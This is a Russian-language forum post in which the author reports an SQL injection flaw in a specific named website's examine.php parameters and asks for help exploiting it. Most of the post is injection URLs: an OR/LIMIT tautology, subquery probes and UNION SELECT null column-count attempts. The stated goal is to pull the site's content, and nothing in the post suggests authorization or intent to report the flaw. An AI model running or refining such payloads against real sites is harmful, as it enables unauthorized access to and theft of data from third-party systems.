Здрасьте.

нашел багу на pimpmyguide.com (эксплойты для онлайн игр).

_http://www.pimpmyguide.com/examine.php?id=5&tid=9

Подвержены значения id и tid:

_http://www.pimpmyguide.com/examine.php?id=5&tid=9 or tid=6 LIMIT 10--



У самого опыта маловато, вообщем, попытался узнать, поддерживает ли сервер вложенные запросы

_http://www.pimpmyguide.com/examine.php?id=5&tid=(SELECT 9) работает, а (SELECT 3+6) не работает

Значит нет?

_http://www.pimpmyguide.com/examine.php?id=5&tid=6 UNION SELECT null,null,null,null --

- нулей пробовал кучу, все равно не хочет.

Хочется контент получить,.. Кто нибудь может помочь?

Спасибо.